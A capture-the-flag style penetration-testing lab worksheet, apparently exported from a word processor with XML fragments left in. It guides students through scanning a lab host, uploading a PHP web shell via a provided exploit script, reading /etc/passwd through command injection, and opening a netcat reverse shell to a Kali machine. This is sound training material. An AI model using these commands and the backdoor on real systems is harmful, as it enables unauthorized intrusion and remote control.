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zht00mzf3q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Instructions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Nmap to identify the IP address of Target 2.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Target 2's IP Address: 192.168.1.115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Nmap to document all exposed ports and services at this IP address.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Enumerate the web server with nikto.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Run: nikto -C all -h http://192.168.1.115/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008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Perform a more in-depth enumeration with gobuster.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Hint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Install gobuster using apt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Run gobuster -w /path/to/wordlist dir -u http://192.168.1.115/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/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt as your wordlist (-w).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E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searchsploit to find any known vulnerabilities associated with the programs found in Step #4. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hint</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Run searchsploit -h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the provided script exploit.sh to exploit this vulnerability by opening an Ncat connection to your Kali VM.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 the line at the top of the script that sets the TARGET variable. Set it equal to the IP address of Target 2.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script. It uploads a file called backdoor.php to the target server. This file can be used to execute command injection attacks.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5248275" cy="381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to: http://192.168.1.115/backdoor.php?cmd=&lt;CMD&gt;</w:t>
        <w:br w:type="textWrapping"/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This allows you to run bash commands on Target 2.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For example, try: http://192.168.1.115/backdoor.php?cmd=cat%20/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016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Next, use the backdoor to open a shell session on the target.</w:t>
        <w:br w:type="textWrapping"/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On your </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> VM, start a netcat listener: nc -lnvp 4444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 the browser, use the backdoor to run: nc &lt;Kali IP&gt; 4444 -e /bin/bash. For example, your query string will look like http://192.168.1.115/backdoor.php?cmd=nc%20192.168.1.90%204444%20-e%20/bin/bash.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A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Using the shell you've opened on Target 2, find a flag in /var/www.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4581525" cy="1438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Next, find a flag in the WordPress uploads directory.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Hint</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Use the find command: find /var/www -type f -iname 'flag*'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you find all three flags -- congratulations! There is a fourth, but escalating to root is extremely difficult: For now, move on to completing a report about Target 2.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